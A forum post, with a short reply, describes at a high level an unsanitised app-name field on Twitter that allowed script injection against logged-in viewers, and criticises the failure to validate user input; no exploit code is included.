There isn’t much talk of Twitter on these forums, but a friend of mine has just discovered (yesterday) a rather embarrassing vulnerability in Twitter.
Details here
http://www.davidnaylor.co.uk/twitter-exploit-still-works.html
Basically when you tweet the app you post from gets to add its name to the message like TweetDeck, TwitterFox, HootSuite or web so people know where you are tweeting from.
It seems that Twitter didn’t check the input on this and so a malicious user can create a simple twitter app to do run their own code whenever you see a message from them.
So if your see a message from a malicious user and are logged into the Twitter.com site, they can run code to steal your Twitter login details, delete your tweets or tweet as you!
As a programmer myself I’m pretty disappointed that they forgot the number one rule for client interaction – never, ever trust user input.
Details here
http://www.davidnaylor.co.uk/twitter-exploit-still-works.html
Basically when you tweet the app you post from gets to add its name to the message like TweetDeck, TwitterFox, HootSuite or web so people know where you are tweeting from.
It seems that Twitter didn’t check the input on this and so a malicious user can create a simple twitter app to do run their own code whenever you see a message from them.
So if your see a message from a malicious user and are logged into the Twitter.com site, they can run code to steal your Twitter login details, delete your tweets or tweet as you!
As a programmer myself I’m pretty disappointed that they forgot the number one rule for client interaction – never, ever trust user input.
they'll soon learn after the first few hundred goes walkies.